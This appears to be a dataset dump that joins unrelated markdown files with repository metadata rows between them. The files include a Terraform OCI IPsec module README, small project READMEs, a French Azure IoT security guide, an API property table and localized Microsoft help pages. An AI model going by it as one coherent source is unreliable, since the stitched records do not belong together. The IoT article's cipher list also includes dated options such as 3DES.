  # ipsec_id - (required) is a type of string
  ipsec_id = var.ipsec_id
  # routing - (required) is a type of string
  routing = var.routing
  # shared_secret - (optional) is a type of string
  shared_secret = var.shared_secret
  # tunnel_id - (required) is a type of string
  tunnel_id = var.tunnel_id

  dynamic "bgp_session_info" {
    for_each = var.bgp_session_info
    content {
      # customer_bgp_asn - (optional) is a type of string
      customer_bgp_asn = bgp_session_info.value["customer_bgp_asn"]
      # customer_interface_ip - (optional) is a type of string
      customer_interface_ip = bgp_session_info.value["customer_interface_ip"]
      # oracle_interface_ip - (optional) is a type of string
      oracle_interface_ip = bgp_session_info.value["oracle_interface_ip"]
    }
  }

  dynamic "encryption_domain_config" {
    for_each = var.encryption_domain_config
    content {
      # cpe_traffic_selector - (optional) is a type of list of string
      cpe_traffic_selector = encryption_domain_config.value["cpe_traffic_selector"]
      # oracle_traffic_selector - (optional) is a type of list of string
      oracle_traffic_selector = encryption_domain_config.value["oracle_traffic_selector"]
    }
  }

  dynamic "timeouts" {
    for_each = var.timeouts
    content {
      # create - (optional) is a type of string
      create = timeouts.value["create"]
      # delete - (optional) is a type of string
      delete = timeouts.value["delete"]
      # update - (optional) is a type of string
      update = timeouts.value["update"]
    }
  }
}
```

[top](#index)

### Outputs

```terraform
output "compartment_id" {
  description = "returns a string"
  value       = oci_core_ipsec_connection_tunnel_management.this.compartment_id
}

output "cpe_ip" {
  description = "returns a string"
  value       = oci_core_ipsec_connection_tunnel_management.this.cpe_ip
}

output "display_name" {
  description = "returns a string"
  value       = oci_core_ipsec_connection_tunnel_management.this.display_name
}

output "id" {
  description = "returns a string"
  value       = oci_core_ipsec_connection_tunnel_management.this.id
}

output "ike_version" {
  description = "returns a string"
  value       = oci_core_ipsec_connection_tunnel_management.this.ike_version
}

output "shared_secret" {
  description = "returns a string"
  value       = oci_core_ipsec_connection_tunnel_management.this.shared_secret
}

output "state" {
  description = "returns a string"
  value       = oci_core_ipsec_connection_tunnel_management.this.state
}

output "status" {
  description = "returns a string"
  value       = oci_core_ipsec_connection_tunnel_management.this.status
}

output "time_created" {
  description = "returns a string"
  value       = oci_core_ipsec_connection_tunnel_management.this.time_created
}

output "time_status_updated" {
  description = "returns a string"
  value       = oci_core_ipsec_connection_tunnel_management.this.time_status_updated
}

output "vpn_ip" {
  description = "returns a string"
  value       = oci_core_ipsec_connection_tunnel_management.this.vpn_ip
}

output "this" {
  value = oci_core_ipsec_connection_tunnel_management.this
}
```

[top](#index)
23.417625
89
0.682264
eng_Latn
0.757026
5398bb87e4048ea288710a0ee5ba2a8e6bdf0b97
35
md
Markdown
README.md
Mudimedia/github-api
835a8a348d315d6293d87bb2432f40eb847fb53d
[ "MIT" ]
1
2021-08-08T16:57:02.000Z
2021-08-08T16:57:02.000Z
README.md
Mudimedia/github-api
835a8a348d315d6293d87bb2432f40eb847fb53d
[ "MIT" ]
null
null
null
README.md
Mudimedia/github-api
835a8a348d315d6293d87bb2432f40eb847fb53d
[ "MIT" ]
null
null
null
# github-api

Connect to Github API
11.666667
21
0.771429
eng_Latn
0.906219
539a0aecfcc9dbf04831948195d82b20de275133
344
md
Markdown
README.md
iiiypuk/gemini
ad25238fd5f0885463849d1789c2985abe4d67d9
[ "MIT" ]
1
2021-06-14T01:34:10.000Z
2021-06-14T01:34:10.000Z
README.md
iiiypuk/gemini
ad25238fd5f0885463849d1789c2985abe4d67d9
[ "MIT" ]
null
null
null
README.md
iiiypuk/gemini
ad25238fd5f0885463849d1789c2985abe4d67d9
[ "MIT" ]
null
null
null
## This repo is deprecated

New repo URL: https://iiiypuk.me/git/iiiypuk/Gemini

## Using Software

* Server: [agate](https://github.com/mbrubeck/agate)
* HTTP proxy: [kineto](https://git.sr.ht/~sircmpwn/kineto)
* Client: [amfora](https://github.com/makeworld-the-better-one/amfora)
* HTTP: [vulpes.one](https://proxy.vulpes.one/gemini/iiiypuk.me/)
38.222222
70
0.726744
yue_Hant
0.619628
539a0f18cde17b87d415e5ccaa025cbe8bb81f4a
723
md
Markdown
README.md
trustedhousesitters/docz-plugin-svg-sprite-loader
8a8c276bc15306b24f73855d32f8cd013f578ca0
[ "MIT" ]
2
2019-06-08T01:05:43.000Z
2020-04-29T07:29:07.000Z
README.md
trustedhousesitters/docz-plugin-svg-sprite-loader
8a8c276bc15306b24f73855d32f8cd013f578ca0
[ "MIT" ]
null
null
null
README.md
trustedhousesitters/docz-plugin-svg-sprite-loader
8a8c276bc15306b24f73855d32f8cd013f578ca0
[ "MIT" ]
null
null
null
# docz-plugin-svg-sprite-loader

Allows you to use [svg-sprite-loader](https://github.com/kisenka/svg-sprite-loader) in your Docz config. This currently replaces all other svg loaders.

## Install

```bash
$ yarn add docz-plugin-svg-sprite-loader
```

## Usage

```js
import { svgSpriteLoader } from 'docz-plugin-svg-sprite-loader';

export default {
  plugins: [svgSpriteLoader()],
};
```

## Options

Options can be passed into the function as the first argument. See [svg-sprite-loader](https://github.com/kisenka/svg-sprite-loader) for the full list of options.

```js
import { svgSpriteLoader } from 'docz-plugin-svg-sprite-loader';

export default {
  plugins: [svgSpriteLoader({ symbolId: 'icon-' })],
};
```
20.657143
162
0.710927
eng_Latn
0.388804
539a6f14a25f458c17f190c34733a6d9d3d16e6b
582
md
Markdown
wiki/translations/es/3D_input_devices.md
dwhr-pi/FreeCAD-documentation
0c889672d80e7969dcabe83f5ddf503e72a4f5bb
[ "CC0-1.0" ]
null
null
null
wiki/translations/es/3D_input_devices.md
dwhr-pi/FreeCAD-documentation
0c889672d80e7969dcabe83f5ddf503e72a4f5bb
[ "CC0-1.0" ]
null
null
null
wiki/translations/es/3D_input_devices.md
dwhr-pi/FreeCAD-documentation
0c889672d80e7969dcabe83f5ddf503e72a4f5bb
[ "CC0-1.0" ]
null
null
null
# 3D input devices/es

FreeCAD supports some specialized input devices, such as 3D mice. These allow the user to rotate, move, and zoom objects in three dimensions.

## Supported hardware

<div class="mw-translate-fuzzy">

- 3Dconnexion [SpaceNavigator](http://www.3dconnexion.com/products/spacenavigator.html)
- Installation instructions: [3Dconnexion](3Dconnexion_input_devices/es.md)

</div>

[category:Documentation](category_Documentation.md)

---
![](images/Right_arrow.png) [documentation index](../README.md) > 3D input devices/es
27.714286
169
0.766323
spa_Latn
0.477954
539a9000cad1aeac24d85672b91b9cdcd7340a6b
926
md
Markdown
sdk/docs/FiscalYears.md
freee/freee-accounting-sdk-java
2102cf9bf261683d3e81bca16b0aa6e14cef14b4
[ "MIT" ]
6
2019-10-11T06:52:07.000Z
2022-03-05T02:30:32.000Z
sdk/docs/FiscalYears.md
freee/freee-accounting-sdk-java
2102cf9bf261683d3e81bca16b0aa6e14cef14b4
[ "MIT" ]
7
2019-09-10T01:30:30.000Z
2021-10-21T01:18:13.000Z
sdk/docs/FiscalYears.md
freee/freee-accounting-sdk-java
2102cf9bf261683d3e81bca16b0aa6e14cef14b4
[ "MIT" ]
5
2019-10-11T06:56:10.000Z
2022-02-05T14:55:21.000Z
# FiscalYears

## Properties

Name | Type | Description | Notes
------------ | ------------- | ------------- | -------------
**depreciationRecordMethod** | **Integer** | Monthly depreciation (0: no, 1: yes) |
**endDate** | **String** | Last day of the fiscal year | [optional]
**indirectWriteOffMethod** | **Boolean** | Deduction method for fixed assets (true: indirect method, false: direct method) |
**returnCode** | **Integer** | Real estate income usage classification (0: general, 3: general/real estate). Note: can only be set for sole proprietors |
**salesTaxBusinessCode** | **Integer** | Business classification for simplified taxation (0: Type 1: wholesale; 1: Type 2: retail; 2: Type 3: agriculture, forestry, fisheries, mining, construction, manufacturing, etc.; 3: Type 4: restaurants, etc.; 4: Type 5: finance/insurance, transportation/communications, services, etc.; 5: Type 6: real estate, etc.) |
**startDate** | **String** | First day of the fiscal year | [optional]
**taxAccountMethod** | **Integer** | Consumption tax accounting method (0: tax-inclusive, 1: legacy tax-exclusive, 2: tax-exclusive) |
**taxFraction** | **Integer** | Consumption tax rounding method (0: round down, 1: round up, 2: round half up) |
**taxMethod** | **Integer** | Taxation classification (0: tax exempt, 1: simplified taxation, 2: standard taxation (itemized method), 3: standard taxation (lump-sum proportional allocation method), 4: standard taxation (full deduction)) |
**useIndustryTemplate** | **Boolean** | Manufacturing-industry features (true: use, false: do not use) |
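For reference, a settings object using these properties might look like the following Python dictionary. The field names come straight from the table above; the values are illustrative only and do not come from the SDK.

```python
# Hypothetical example values; field names are from the property table above.
fiscal_year = {
    "depreciationRecordMethod": 1,   # monthly depreciation: yes
    "startDate": "2019-01-01",
    "endDate": "2019-12-31",
    "indirectWriteOffMethod": True,  # indirect deduction method
    "returnCode": 0,                 # general
    "salesTaxBusinessCode": 1,       # Type 2: retail
    "taxAccountMethod": 2,           # tax-exclusive accounting
    "taxFraction": 0,                # round down
    "taxMethod": 4,                  # standard taxation (full deduction)
    "useIndustryTemplate": False,
}
```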
40.26087
157
0.595032
yue_Hant
0.902983
539a9e2cdcbece174ad708f6b9a9da136b4060eb
2,838
md
Markdown
core/changelog.md
bewillcott/bewsoftware-mdj
c651e302f2e7ac9175952f8db419abaa7b9242fa
[ "BSD-3-Clause" ]
1
2020-01-29T08:15:58.000Z
2020-01-29T08:15:58.000Z
core/changelog.md
bewillcott/bewsoftware-mdj
c651e302f2e7ac9175952f8db419abaa7b9242fa
[ "BSD-3-Clause" ]
null
null
null
core/changelog.md
bewillcott/bewsoftware-mdj
c651e302f2e7ac9175952f8db419abaa7b9242fa
[ "BSD-3-Clause" ]
null
null
null
# Change Log - Markdownj-Core

## What's New

This version is a fork of the [main] project. I don't know if it will be integrated back into that project, or continue as a separate one.

## Version: 0.5.x Snapshot

### Code review

All the code was reviewed and updated to the latest Java features.

- Where useful, anonymous classes were converted to the Lambda format.
- To help with clarity, I also ran the Netbeans: Source->Organize Members menu option.
- Cleaned up some code that was either unnecessary, or could be redone in a less verbose manner.

### Extended markdown capability

#### Fenced Code Blocks

Start a line with "~~~" or "\`\`\`". The fencing requires that the block ends with the same sequence as it starts with.

Wraps the text between the fences in:

```
<pre>
    <code>
The text
    </code>
</pre>
```

#### Tables

~~~
This would be the table's caption
| Col1 Header | Col2 Header |Col3 Header|Col 4 |[]
| :---- | -:- | ---: | :---: |[#Id][]
| Left | Center |Right |Justified|[]
| Row 2 | More text | | |
~~~

This would be the table's caption

| Col1 Header | Col2 Header |Col3 Header|Col 4 |[]
| :---- | -:- | ---: | :---: |[#Id][]
| Left | Center |Right |Justified|[]
| Row 2 | More text | | |

A Table begins and ends with a blank line. If present, the first row above the table becomes the table's "caption". If the _caption_ text is bracketed thus: `[This would be the table's caption]`, then it would be given the same borders as are set for the `<table>` element. See the table below [&darr;](#Id2)

Each line begins and ends with a pipe character '|', with additional such to separate columns.

Each line can have an optional __[]__ bracketed parameter or two. If just one is provided, then when empty `[]`, it adds a border around that row. If it contains text, the text is inserted into a 'class=' attribute for that row.

Special cases:

- The delimiter row (contains the `-` and `:` characters) sets the parameters for the `<table>` tag.
- Data rows:
    - If just the first one is set with a bracketed parameter, then this will be used for all data rows.
    - Subsequent rows can be set to either the same class(es) as the first row or to different class(es).
    - Any following rows not set, will be configured using the row sequencing of the first set of rows, in rotation.

[This would be the table's caption]
| Col1 Header | Col2 Header |Col3 Header|Col 4 |[]
| :---- | -:- | ---: | :---: |[#Id2][]
| Left | Center |Right |Justified|[]
| Row 2 | More text | | |

### Further Reading

You can find a lot more information in the manual.

[main]:https://github.com/myabc/markdownj
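The fencing rule above, that a block must be closed by the same sequence that opened it, is easy to state precisely in code. The Python sketch below is illustrative only (MarkdownJ itself is a Java library), but it implements exactly that rule.

```python
import re

# Illustrative sketch of the fence rule described above: a block opened with
# "~~~" or "```" must be closed by the same sequence. This is not MarkdownJ's
# actual Java implementation.
FENCE = re.compile(r"^(~~~|```)\s*$")

def extract_fenced_blocks(lines):
    blocks, current, opener = [], None, None
    for line in lines:
        m = FENCE.match(line)
        if m and current is None:          # opening fence
            opener, current = m.group(1), []
        elif m and m.group(1) == opener:   # matching closing fence
            blocks.append("\n".join(current))
            current, opener = None, None
        elif current is not None:          # inside a block; keep the line
            current.append(line)
    return blocks

text = ["before", "~~~", "let x = 1;", "~~~", "after"]
print(extract_fenced_blocks(text))  # ['let x = 1;']
```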
32.25
100
0.628259
eng_Latn
0.99828
539b72d680b0b3aef5921aba2dcd9ab8f70d8543
61
md
Markdown
README.md
NeuroLang/vwfa_language_attention
e82c6f08c313b4d3c18b231e19ed6d9f45bc2d94
[ "BSD-3-Clause" ]
null
null
null
README.md
NeuroLang/vwfa_language_attention
e82c6f08c313b4d3c18b231e19ed6d9f45bc2d94
[ "BSD-3-Clause" ]
null
null
null
README.md
NeuroLang/vwfa_language_attention
e82c6f08c313b4d3c18b231e19ed6d9f45bc2d94
[ "BSD-3-Clause" ]
null
null
null
# vwfa_language_attention

Code corresponding to the article
20.333333
34
0.852459
eng_Latn
0.979353
539bb82384c6b6d485e63a45f944090f8c05f7e5
15,368
md
Markdown
includes/iot-secure-your-deployment.md
OpenLocalizationTestOrg/azure-docs-pr15_fr-BE
753623e5195c97bb016b3a1f579431af9672c200
[ "CC-BY-3.0", "CC-BY-4.0", "MIT" ]
null
null
null
includes/iot-secure-your-deployment.md
OpenLocalizationTestOrg/azure-docs-pr15_fr-BE
753623e5195c97bb016b3a1f579431af9672c200
[ "CC-BY-3.0", "CC-BY-4.0", "MIT" ]
null
null
null
includes/iot-secure-your-deployment.md
OpenLocalizationTestOrg/azure-docs-pr15_fr-BE
753623e5195c97bb016b3a1f579431af9672c200
[ "CC-BY-3.0", "CC-BY-4.0", "MIT" ]
null
null
null
# <a name="securing-your-iot-deployment"></a>Sécurisation de votre déploiement IoT Cet article fournit le niveau suivant de détails pour la sécurisation de l’infrastructure de l’Internet des objets basés sur Azure IoT (IoT). Il lie aux détails d’implémentation au niveau de la configuration et le déploiement de chaque composant. Il fournit également les comparaisons et le choix entre différentes méthodes de concurrents. Sécurisation du déploiement d’Azure IoT peut être divisé en zones de trois sécurité suivantes : - **Dispositif de sécurité**: sécurisation du périphérique IoT pendant qu’il est déployé dans la nature. - **Sécurité de la connexion**: toutes les données transmises entre le IoT périphérique et IoT concentrateur est confidentielle et inviolable. - **Sécurité du nuage**: fournir un moyen pour sécuriser les données pendant qu’il parcourt et est stocké dans le nuage. ![Trois zones de sécurité][img-overview] ## <a name="secure-device-provisioning-and-authentication"></a>Mise en service du dispositif de sécurité et authentification La Suite de IoT Azure sécurise les périphériques IoT par le des deux méthodes suivantes : - En fournissant une clé d’identité unique (jetons de sécurité) pour chaque périphérique, ce qui peut être utilisé par le périphérique pour communiquer avec le IoT Hub. - À l’aide d’un [certificat X.509] sur périphérique[ lnk-x509] et la clé privée comme un moyen d’authentifier le périphérique sur le concentrateur IoT. Cette méthode d’authentification permet de s’assurer que la clé privée sur le périphérique ne connaît pas à l’extérieur de l’appareil à tout moment, fournissant un niveau de sécurité supérieur. La méthode de jeton de sécurité fournit une authentification pour chaque appel effectué par le périphérique pour le concentrateur de IoT en associant la clé symétrique à chaque appel. Authentification basée sur les X.509 permet l’authentification d’un dispositif IoT au niveau de la couche physique dans le cadre de l’établissement de la connexion TLS. La méthode basée sur des jetons de sécurité peut être utilisée sans l’authentification X.509, qui est un modèle moins sécurisé. Le choix entre les deux méthodes dépend principalement la sécurisation du périphérique d’authentification doit être et la disponibilité de stockage sécurisé sur le périphérique (pour stocker la clé privée en toute sécurité). ## <a name="iot-hub-security-tokens"></a>Jetons de sécurité IoT concentrateur IoT Hub utilise les jetons de sécurité pour authentifier les périphériques et les services afin d’éviter l’envoi de clés sur le réseau. En outre, les jetons de sécurité sont limités dans la portée et de la période de validité. Azure SDK de concentrateur IoT générer automatiquement des jetons sans configuration spéciale. Certains scénarios, toutefois, exigent de l’utilisateur de générer et d’utiliser directement les jetons de sécurité. Il s’agit notamment de l’utilisation directe des surfaces MQTT, AMQP ou HTTP, ou la mise en oeuvre du modèle service de jeton. 
You can find more details on the security token structure and its use in the following articles:

- [Security token structure][lnk-security-tokens]
- [Using SAS tokens as a device][lnk-sas-tokens]

Each IoT hub has a [device identity registry][lnk-identity-registry] that can be used to create per-device resources in the service, such as a queue that contains in-flight cloud-to-device messages, and to allow access to the device-facing endpoints.

The IoT Hub identity registry provides secure storage of device identities and security keys for a solution. Individual or groups of device identities can be added to an allow list or a block list, enabling complete control over device access. The following articles provide more details about the structure of the device identity registry and the operations it supports.

[IoT Hub supports protocols such as HTTP, AMQP, and MQTT][lnk-protocols]. Each of these protocols uses security tokens from the IoT device to IoT Hub differently:

- AMQP: SASL PLAIN and AMQP claims-based security ({policyName}@sas.root.{iothubName} in the case of hub-level tokens; {deviceId} in the case of device-scoped tokens).
- MQTT: The CONNECT packet uses {deviceId} as the {ClientId}, {IoThubhostname}/{deviceId} in the **Username** field, and a SAS token in the **Password** field.
- HTTP: A valid token is in the authorization request header.

The IoT Hub device identity registry can be used to configure per-device security credentials and access control. However, if an IoT solution has already made a significant investment in a [custom device identity registry and/or authentication scheme][lnk-custom-auth], it can be integrated into an existing infrastructure with IoT Hub by creating a token service.

### <a name="x509-certificate-based-device-authentication"></a>X.509 certificate-based device authentication

The use of a [device-based X.509 certificate][lnk-use-x509] and its associated private and public key pair allows additional authentication at the physical layer. The private key is stored securely in the device and is not discoverable outside the device. The X.509 certificate contains information about the device, such as the device ID and other organizational details. A signature of the certificate is generated using the private key.

High-level device provisioning flow:

- Associate an identifier with a physical device: the device identity and/or X.509 certificate is associated with the device during device manufacturing or commissioning.
- Create a corresponding identity entry in IoT Hub: the device identity and associated device information in the IoT Hub device registry.
- Securely store the X.509 certificate thumbprint in the IoT Hub device registry.
### <a name="root-certificate-on-device"></a>Certificat racine sur le périphérique Lors de l’établissement d’une connexion TLS sécurisée avec IoT concentrateur, le périphérique IoT authentifie concentrateur IoT à l’aide d’un certificat racine qui fait partie du Kit de développement logiciel de périphérique. Pour le Kit de développement logiciel du client C le certificat se trouve dans le dossier «\\c\\certificats » sous la racine de la mis en pension. Bien que ces certificats racines sont durables, ils toujours peuvent expirer ou être révoqués. S’il n’existe aucun moyen de mise à jour du certificat sur le périphérique, le périphérique n’est peut-être pas capable de se connecter par la suite le concentrateur IoT (ou tout autre service de cloud). Avoir un moyen de mettre à jour le certificat racine, une fois le périphérique IoT déployé réduire de manière efficace ce risque. ## <a name="securing-the-connection"></a>Sécurisation de la connexion Connexion Internet entre le dispositif de IoT et IoT concentrateur est sécurisée à l’aide de la norme de sécurité TLS (Transport Layer). IoT Azure prend en charge [TLS 1.2][lnk-tls12], TLS 1.1 et TLS 1.0, dans cet ordre. Prise en charge de TLS 1.0 est fournie pour la compatibilité ascendante. Il est recommandé d’utiliser TLS 1.2 dans la mesure où il fournit le plus de sécurité. Azure IoT Suite prend en charge les Suites de chiffrement suivants, dans cet ordre. | Suite de chiffrement | Longueur | |--------------|--------| | TLS\_ECDHE\_RSA\_WITH\_AES\_256\_CBC\_SHA384 secp384r1 ECDH (0xc028) (ég. 7680 bits RSA) FS | 256 | | TLS\_ECDHE\_RSA\_WITH\_AES\_128\_CBC\_SHA256 secp256r1 ECDH (0xc027) (ég. FS de 3072 bits RSA) | 128 | | TLS\_ECDHE\_RSA\_WITH\_AES\_256\_CBC\_SHA (0xc014) secp384r1 ECDH (ég. 7680 bits RSA) FS | 256 | | TLS\_ECDHE\_RSA\_WITH\_AES\_128\_CBC\_SHA (0xc013) secp256r1 ECDH (ég. FS de 3072 bits RSA) | 128 | | TLS\_RSA\_WITH\_AES\_256\_GCM\_SHA384 (0x9d) | 256 | | TLS\_RSA\_WITH\_AES\_128\_GCM\_SHA256 (0x9C.) | 128 | | TLS\_RSA\_WITH\_AES\_256\_CBC\_SHA256 (0x3d) | 256 | | TLS\_RSA\_WITH\_AES\_128\_CBC\_SHA256 (0x3c) | 128 | | TLS\_RSA\_WITH\_AES\_256\_CBC\_SHA (0x35) | 256 | | TLS\_RSA\_WITH\_AES\_128\_CBC\_SHA (0x2f) | 128 | | TLS\_RSA\_WITH\_3DES\_EDE\_CBC\_SHA (0xa) | 112 | ## <a name="securing-the-cloud"></a>Sécurisation du cloud Concentrateur de IoT Azure permet la définition des [stratégies de contrôle d’accès] [ lnk-protocols] pour chaque clé de sécurité. Il utilise l’ensemble des autorisations suivantes pour accorder l’accès à chacun des points de terminaison du concentrateur IoT. Autorisations de limitent l’accès à un concentrateur IoT basé sur la fonctionnalité. - **RegistryRead**. Accorde l’accès en lecture à l’identité de périphérique du Registre. Pour plus d’informations, consultez le [Registre d’identité de périphérique][lnk-identity-registry]. - **RegistryReadWrite**. Lire des subventions et l’accès en écriture sur le Registre d’identité de périphérique. Pour plus d’informations, consultez le [Registre d’identité de périphérique][lnk-identity-registry]. - **ServiceConnect**. Accorde l’accès à la communication et surveillance des points de terminaison orientés vers le service en nuage. Par exemple, il accorde l’autorisation pour les services en nuage de back-end pour recevoir des messages de périphérique-nuage, envoyer des messages du nuage vers le périphérique et récupérer les accusés de réception de livraison correspondante. - **DeviceConnect**. 
Grants access to device-facing communication endpoints. For example, it grants permission to send device-to-cloud messages and receive cloud-to-device messages. This permission is used by devices.

There are two ways to obtain **DeviceConnect** permissions with IoT Hub using [security tokens][lnk-sas-tokens]: using a device identity key, or a shared access policy key. Moreover, it is important to note that all functionality accessible from devices is exposed by design on endpoints with the prefix `/devices/{deviceId}`.

[Service components can only generate security tokens][lnk-service-tokens] using shared access policies that grant the appropriate permissions.

Azure IoT Hub, and other services that may be part of the solution, allow user management using Azure Active Directory.

Data ingested by Azure IoT Hub can be consumed by a variety of services such as Azure Stream Analytics and Azure Blob storage. These services allow management access. Read about these services and the available options below:

- [Azure DocumentDB][lnk-docdb]: A scalable, fully indexed database service for semi-structured data that manages metadata for the devices you provision, such as attributes, configuration, and security properties. DocumentDB offers high-performance and high-throughput processing, schema-agnostic indexing of data, and a rich SQL query interface.
- [Azure Stream Analytics][lnk-asa]: Real-time stream processing in the cloud that lets you rapidly develop and deploy a low-cost analytics solution to uncover real-time insights from devices, sensors, infrastructure, and applications. The data from this fully managed service can scale to any volume while still achieving high throughput, low latency, and resiliency.
- [Azure App Services][lnk-appservices]: A cloud platform for building powerful web and mobile apps that connect to data anywhere, in the cloud or on-premises. Build engaging mobile apps for iOS, Android, and Windows. Integrate with your Software as a Service (SaaS) and enterprise applications with out-of-the-box connectivity to dozens of cloud-based services and enterprise applications. Code in your favorite language and IDE (.NET, NodeJS, PHP, Python, or Java) to build web apps and APIs faster than ever.
- [Logic Apps][lnk-logicapps]: The Logic Apps feature of Azure App Service helps integrate your IoT solution with your existing line-of-business systems and automate workflow processes. Logic Apps enables developers to design workflows that start from a trigger and then execute a series of steps, rules, and actions that use powerful connectors to integrate with your business processes. Logic Apps offers out-of-the-box connectivity to a vast ecosystem of SaaS, cloud-based, and on-premises applications.
- [Azure Blob storage][lnk-blob]: Reliable, economical cloud storage for the data that your devices send to the cloud.

## <a name="conclusion"></a>Conclusion

This article provides an overview level of detail for designing and deploying an IoT infrastructure using Azure IoT. Configuring each component to be secure is key to securing the overall IoT infrastructure. The design choices available in Azure IoT provide some level of flexibility and choice; however, each choice may have security implications. It is recommended that each of these choices be evaluated through a risk/cost assessment.

[img-overview]: media/iot-secure-your-deployment/overview.png
[lnk-security-tokens]: ../articles/iot-hub/iot-hub-devguide-security.md#security-token-structure
[lnk-sas-tokens]: ../articles/iot-hub/iot-hub-devguide-security.md#use-sas-tokens-as-a-device
[lnk-identity-registry]: ../articles/iot-hub/iot-hub-devguide-identity-registry.md
[lnk-protocols]: ../articles/iot-hub/iot-hub-devguide-security.md
[lnk-custom-auth]: ../articles/iot-hub/iot-hub-devguide-security.md#custom-device-authentication
[lnk-x509]: http://www.itu.int/rec/T-REC-X.509-201210-I/en
[lnk-use-x509]: ../articles/iot-hub/iot-hub-devguide-security.md
[lnk-tls12]: https://tools.ietf.org/html/rfc5246
[lnk-service-tokens]: ../articles/iot-hub/iot-hub-devguide-security.md#using-security-tokens-from-service-components
[lnk-docdb]: https://azure.microsoft.com/services/documentdb/
[lnk-asa]: https://azure.microsoft.com/services/stream-analytics/
[lnk-appservices]: https://azure.microsoft.com/services/app-service/
[lnk-logicapps]: https://azure.microsoft.com/services/app-service/logic/
[lnk-blob]: https://azure.microsoft.com/services/storage/
118.215385
801
0.793857
fra_Latn
0.984408
539bfd337dbf5d73beb4f42c80592211491c0825
889
md
Markdown
content/generators/fullscreen-map/1/schema.md
opendatasoft/codelibrary
0a68633c23ab61fdff53aed9b4e6f99a6933f34e
[ "MIT" ]
null
null
null
content/generators/fullscreen-map/1/schema.md
opendatasoft/codelibrary
0a68633c23ab61fdff53aed9b4e6f99a6933f34e
[ "MIT" ]
15
2021-02-02T17:30:57.000Z
2022-01-07T15:26:09.000Z
content/generators/fullscreen-map/1/schema.md
opendatasoft/codelibrary
0a68633c23ab61fdff53aed9b4e6f99a6933f34e
[ "MIT" ]
4
2021-02-25T12:54:49.000Z
2021-09-01T03:46:22.000Z
**Dataset in use:** `fr-esr-principaux-etablissements-enseignement-superieur` [(See it on mesr domain)](https://mesr.opendatasoft.com/explore/dataset/fr-esr-principaux-etablissements-enseignement-superieur/table/) **Fields in use:** |type_d_etablissement|secteur_d_etablissement|dep_nom|uo_lib|adresse_uai|dep_nom|numero_telephone_uai|url| |---|---|---|---|---|---|---|---| |Grand établissement|Public|Paris|Conservatoire national des arts et métiers|292 RUE SAINT MARTIN|Paris|0140272000|http://www.cnam.fr/| |École|Public|Bouches-du-Rhône|Centrale Marseille|38 rue Frédéric-Joliot-Curie|Bouches-du-Rhône|0491282898|https://www.centrale-marseille.fr/| |École|Privé|Paris|École centrale d'électronique|37 quai de Grenelle|Paris|0144390600|https://www.ece.fr/ecole-ingenieur/| |École|Privé|Haute-Garonne|École d'ingénieurs de Purpan|75 VOIE DU TOEC|Haute-Garonne||http://www.purpan.fr/|
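Not part of this note, but for illustration, the dataset shown above can be queried through the public Opendatasoft records API; the endpoint pattern and parameters below are assumptions based on the standard ODS v1 API:

```python
import requests

# Standard Opendatasoft "records search" endpoint (API v1), assumed available on this domain.
url = "https://mesr.opendatasoft.com/api/records/1.0/search/"
params = {
    "dataset": "fr-esr-principaux-etablissements-enseignement-superieur",
    "rows": 5,  # number of records to return
}

resp = requests.get(url, params=params, timeout=10)
resp.raise_for_status()
for record in resp.json()["records"]:
    print(record["fields"].get("uo_lib"), "-", record["fields"].get("dep_nom"))
```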
74.083333
213
0.778403
yue_Hant
0.112395
539c24fed3ee6bca3b218baed4393c0612fc2d0d
1,007
md
Markdown
AlchemyInsights/transfer-form-ownership-to-another-user.md
pebaum/OfficeDocs-AlchemyInsights-pr.cs-CZ
3c55a84664ad4f0f0ef39dced9e6ca253b21ba71
[ "CC-BY-4.0", "MIT" ]
null
null
null
AlchemyInsights/transfer-form-ownership-to-another-user.md
pebaum/OfficeDocs-AlchemyInsights-pr.cs-CZ
3c55a84664ad4f0f0ef39dced9e6ca253b21ba71
[ "CC-BY-4.0", "MIT" ]
null
null
null
AlchemyInsights/transfer-form-ownership-to-another-user.md
pebaum/OfficeDocs-AlchemyInsights-pr.cs-CZ
3c55a84664ad4f0f0ef39dced9e6ca253b21ba71
[ "CC-BY-4.0", "MIT" ]
null
null
null
---
title: Transfer form ownership to another user
ms.author: pebaum
author: pebaum
manager: mnirkhe
ms.audience: Admin
ms.topic: article
ROBOTS: NOINDEX, NOFOLLOW
localization_priority: Normal
ms.collection: Adm_O365
ms.custom:
- "2548"
- "9000672"
ms.openlocfilehash: 6c975955b596a0c8ab2693aa73074ad7c86913e0
ms.sourcegitcommit: 1d98db8acb9959aba3b5e308a567ade6b62da56c
ms.translationtype: MT
ms.contentlocale: cs-CZ
ms.lasthandoff: 08/22/2019
ms.locfileid: "36507192"
---
# <a name="transfer-ownership-of-a-microsoft-form"></a>Transfer ownership of a Microsoft form

You can move a survey, quiz, or poll in Microsoft Forms to a group so that everyone in your group becomes an owner of that form. Ownership of a form can also be transferred to another user if the previous owner has left the organization.

For more information, see [Transfer ownership of a form](https://support.office.com/article/Transfer-ownership-of-a-form-921a6361-a4e5-44ea-bce9-c4ed63aa54b4).
40.28
257
0.823237
ces_Latn
0.996528
539c9698dc9ec547acde0713ac7957c689920bb2
3,783
md
Markdown
docs/integration-services/lesson-5-add-ssis-package-configurations-for-the-package-deployment-model.md
SteSinger/sql-docs.de-de
2259e4fbe807649f6ad0d49b425f1f3fe134025d
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/integration-services/lesson-5-add-ssis-package-configurations-for-the-package-deployment-model.md
SteSinger/sql-docs.de-de
2259e4fbe807649f6ad0d49b425f1f3fe134025d
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/integration-services/lesson-5-add-ssis-package-configurations-for-the-package-deployment-model.md
SteSinger/sql-docs.de-de
2259e4fbe807649f6ad0d49b425f1f3fe134025d
[ "CC-BY-4.0", "MIT" ]
null
null
null
---
title: 'Lesson 5: Add SSIS package configurations for the package deployment model | Microsoft Docs'
ms.custom: ''
ms.date: 01/08/2019
ms.prod: sql
ms.prod_service: integration-services
ms.reviewer: ''
ms.technology: integration-services
ms.topic: tutorial
ms.assetid: 1c10dd54-67cb-4b63-9e4d-aa6ff0452ecb
author: chugugrace
ms.author: chugu
ms.openlocfilehash: d3b3ccea56d367e7870826b39830e415e26bb2ac
ms.sourcegitcommit: e8af8cfc0bb51f62a4f0fa794c784f1aed006c71
ms.translationtype: HT
ms.contentlocale: de-DE
ms.lasthandoff: 09/26/2019
ms.locfileid: "71295911"
---
# <a name="lesson-5-add-ssis-package-configurations-for-the-package-deployment-model"></a>Lesson 5: Add SSIS package configurations for the package deployment model

